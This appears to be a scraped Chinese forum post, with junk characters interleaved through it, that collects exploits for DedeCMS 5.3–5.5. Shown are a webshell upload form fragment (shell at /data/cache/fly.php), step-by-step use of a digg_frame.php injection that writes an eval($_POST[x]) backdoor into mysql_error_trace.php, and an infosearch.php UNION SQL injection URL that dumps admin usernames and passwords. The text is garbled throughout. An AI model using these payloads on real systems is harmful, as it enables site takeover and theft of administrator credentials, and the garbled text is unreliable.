# R( k  R( @# Q/ c% C. A9 |Select U Shell <input type='file' name='uploadfile' size='25' />( \0 E! t  q& G; _  G4 Y
<input type='submit' name='sb1' value='确定' />
6 u- v% v% `: N# `</form>: v& d5 E2 b% i
<br />It's just a exp for the bug of Dedecms V55...<br />; `6 J+ G. C- z) N/ @$ S0 s( Y
Need register_globals = on...<br />( G% M2 [# f. S2 E
Fun the game,get a webshell at /data/cache/fly.php...<br />0 B. A/ B7 b3 M9 i, U- l
</body>
- ~" {1 O3 a  z; w</html>
7 l! k, V6 I) d! u9 Y$ f/ U! A/ @3 {5 K/ L
) q% I. W* q8 I' @; T
% V. c2 S2 e) _

  B$ p" J: y) r+ P
1 N: b- R, S4 D* T( i; O0 X' P' `2 M
6 I2 G# G2 o9 L) `) j7 t7 k+ D1 ?

6 y! h( k4 k7 e& A8 ]" ?) T# I+ m
, L" B' @$ j/ }6 n6 a2 c* y/ {* ^& w9 W$ V+ p
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞
6 S; W8 g) Y& [, O. h) N利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。
* Z0 Y; R& {8 `/ F8 i) J1. 访问网址：. g  z% M2 g3 C! j0 [! S
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
( S& u* a) ^# f4 C& g可看见错误信息+ c) X( e2 E5 M: B$ q( L
# y5 V1 L' Q! h3 \+ D+ q0 f" t

8 C6 O0 o7 s$ \, S2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。0 s1 \% N; z1 ]" u! n' D
int(3) Error: Illegal double '1024e1024' value found during parsing
& F. _- m. l) L/ P( a  \" Y3 ^Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
6 y6 J  }# l1 h. C2 H' c
4 K# [) K" v1 _$ a/ v# W; F+ F- u4 P9 \$ A; ?' J
3. 执行dede.rar里的文件 test.html，注意 form 中 action 的地址是
/ L* o6 _3 l  z% g5 c4 y* _, h0 X3 d
% |7 f9 I2 M$ s+ P( w
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>4 c7 ^5 i! v0 S, i, r; Y2 \0 \; x

4 y; |" v# T1 d8 W
5 N  X3 u( R$ e! E! Q按确定后的看到第2步骤的信息表示文件木马上传成功.
' t2 T" N3 U$ ~5 g' ]; I5 Q7 m1 z) \8 l' R3 p5 W1 W2 C
/ M2 H! y: H. z$ z/ z2 y
* \3 J' k+ C/ A8 g1 U: |
. s% @: H) Q% J. a- ^
' s4 a" A6 X3 x1 l0 Y
9 W. @) T* }& t! `6 ~" g( e) ?, C( J
* F1 F; L4 `# P' P2 x
5 i: ]- \, I: y' @1 C; B* V
( A, u7 V& o0 j" b* F% v
5 `+ g& N1 k  \% B5 t, G5 ]6 |8 r, O7 H; k
' L& S" p0 h# F

+ d, t/ e5 i" V织梦(DedeCms)plus/infosearch.php 文件注入漏洞
7 i9 ]% k/ O0 \http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*

		自动登录	找回密码
密码			立即注册